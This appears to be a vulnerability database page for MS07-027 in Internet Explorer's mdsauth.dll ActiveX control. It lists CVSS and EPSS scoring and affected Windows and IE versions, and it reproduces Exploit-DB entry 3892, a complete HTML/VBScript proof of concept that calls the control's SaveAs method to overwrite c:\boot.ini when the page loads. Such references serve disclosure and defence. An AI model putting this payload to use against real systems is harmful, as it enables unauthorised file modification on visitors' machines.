Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
9.3 |
|
AV:N/AC:M/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 3892
Publication date : 2007-05-09 22h00 +00:00
Author : Andres Tarasco
EDB Verified : Yes
<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">
</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://www.514.es"
target.SaveAs "c:\boot.ini"
</script>
</body>
</html>
# milw0rm.com [2007-05-10]
Products Mentioned
Configuraton 0
Microsoft>>Windows_2000 >> Version *
Microsoft>>Internet_explorer >> Version 5.01
Configuraton 0
Microsoft>>Windows_2000 >> Version *
Microsoft>>Internet_explorer >> Version 6
Configuraton 0
Microsoft>>Windows_xp >> Version *
Microsoft>>Internet_explorer >> Version 6.0
Microsoft>>Internet_explorer >> Version 7.0
Configuraton 0
Microsoft>>Windows_2003_server >> Version sp1
Microsoft>>Windows_2003_server >> Version sp2
Microsoft>>Internet_explorer >> Version 6.0
Microsoft>>Internet_explorer >> Version 7.0
Configuraton 0
Microsoft>>Windows_vista >> Version *
Microsoft>>Internet_explorer >> Version 7.0
References